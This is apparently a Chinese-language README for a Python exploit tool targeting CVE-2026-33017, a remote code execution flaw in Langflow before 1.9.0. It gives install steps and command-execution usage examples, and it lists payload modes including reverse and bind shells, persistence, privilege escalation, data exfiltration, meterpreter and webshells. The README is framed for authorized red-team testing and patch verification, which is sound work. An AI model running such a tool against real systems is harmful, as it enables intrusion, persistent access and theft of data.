CVE-2026-33017 针对 Langflow <1.9.0 的利用工具。功能包括反向Shell、命令执行、文件操作、持久化及自动化测试。验证严重RCE漏洞影响。仅限授权安全评估使用。
CVE-2026-33017 · 针对 Langflow 远程代码执行的授权安全测试
研究与红队工具,用于在明确授权评估的 Langflow 实例上验证 CVE-2026-33017。禁止未经授权使用。
本项目仅适用于:
未经授权访问计算机系统属违法行为。 您有责任遵守适用法律,并在测试任何目标前获得书面授权。作者不对滥用行为承担任何责任。
用于评估可能受 CVE-2026-33017 影响的 Langflow 部署的异步 Python 框架。支持漏洞检查、载荷模式选择、自动化评估运行以及用于参与文档的结构化报告。
| 条目 | 详情 |
|---|---|
| CVE | CVE-2026-33017 |
| 目标 | Langflow |
| 建议缓解措施 | 升级至 Langflow ≥ 1.9.0 |
| 语言 | Python 3.10+ |
| 版本 | 1.0.0 |
| 作者 | Sudeepa Wanigarathna |
--check-only 模式--auto / 批量执行运行httpx 并支持可配置日志flow-id 和 client-id(用于测试环境)git clone https://github.com/CerberusMrXi/Langflow-cve-2026-33017-exploit
cd Langflow-cve-2026-33017-exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
--check-only
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "id"
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "uname -a" \
--report markdown \
--output-file report.md
python exploit.py -u URL -f FLOW_ID -c CLIENT_ID [选项]
| 标志 | 描述 |
|---|
.
├── exploit.py # 主 CLI 及评估引擎
├── requirements.txt # Python 依赖
├── README.md # 本文件
└── venv/ # 本地虚拟环境(不纳入版本控制)
如果目标存在 CVE-2026-33017 漏洞:
--check-only 以验证补丁生效--check-only欢迎提交有助于提高可靠性、报告准确性、检测准确性或防御文档的贡献。请通过提交问题或拉取请求的方式,明确描述变更内容及在实验环境中的验证方式。
仅供授权安全测试和教育研究使用。
不提供任何担保。使用风险自负,并请遵守相关法律法规。
Sudeepa Wanigarathna
用于授权安全研究 · CVE-2026-33017
-u, --url | 目标基础 URL(例如 http://127.0.0.1:7860) |
-f, --flow-id | Langflow 流程 ID |
-c, --client-id | Client ID Cookie 值 |
| 标志 | 描述 |
|---|
-t, --payload-type | reverse_shell, bind_shell, command_exec, file_read, file_upload, persistence, priv_esc, data_exfil, meterpreter, webshell, all(默认值:reverse_shell) |
-l, --lhost | 监听主机(省略时在适用情况下自动检测) |
-p, --lport | 监听端口(shell/meterpreter 模式必需) |
--cmd | 命令字符串(command_exec 模式) |
--file-path | 文件读/写模式的路径 |
--file-data | 上传内容(file_upload 模式) |
| 标志 | 描述 |
|---|
--auto | 自动化利用工作流 |
--check-only | 仅进行漏洞检查 |
--batch | 批量模式 |
--report | text | json | html | markdown |
--output-file | 将报告/输出写入文件 |
-v, --verbose | 详细日志输出 |
-q, --quiet | 仅显示错误 |